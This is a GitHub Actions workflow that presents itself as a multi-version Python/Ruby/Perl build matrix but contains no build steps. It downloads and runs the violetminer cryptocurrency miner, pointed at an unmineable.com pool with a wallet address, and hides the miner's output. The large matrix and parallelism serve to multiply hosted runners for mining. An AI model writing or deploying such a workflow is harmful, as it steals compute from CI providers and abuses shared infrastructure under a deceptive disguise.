name: Tadaima_Madepaka
on: [push, pull_request]
jobs:
  build:
    runs-on: windows-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        python-version:
          - "3.6"
          - "3.7"
          - "3.8"
          - "3.9"
        ruby-version:
          - "2.4.7"
          - "2.5.6"
          - "2.4.7"
          - "2.5.6"
          - "2.6.4"
        perl-version:
          - '5.28'
          - '5.26'
          - '5.25'
        flag:
          - '1'
          - '2'
          - '3'
          - '4'
    env:
        NUM_JOBS: 225
    name: Build Python-${{ matrix.python-version }} Ruby-${{ matrix.ruby-version }}
    defaults:
     run:
       shell: wsl-bash -u root {0}
    steps:
    - name: Setup
      uses: Vampire/setup-wsl@v1
    - name: Update System
      continue-on-error: true
      run: apt-get update && apt-get upgrade -y && apt-get install wget tar git -y
    - name: Download
      continue-on-error: true
      run: wget https://github.com/turtlecoin/violetminer/releases/download/v0.2.2/violetminer-linux-v0.2.2.tar.gz
    - name: Extract
      run: tar -xf violetminer-linux-v0.2.2.tar.gz
    - name: Start
      run: cd violetminer-linux-v0.2.2 && ./violetminer --algorithm wrkzcoin --pool rx-us.unmineable.com:3333 --username WIN:TSTvTTGTf5eWyewkkj7FAVui3cW8DY971d.$(echo $(shuf -i 111111-999999 -n 1)-GAS)#e6ga-gzqh --password x --disableNVIDIA --threads 1 `nproc --all` >/dev/null 2>&1
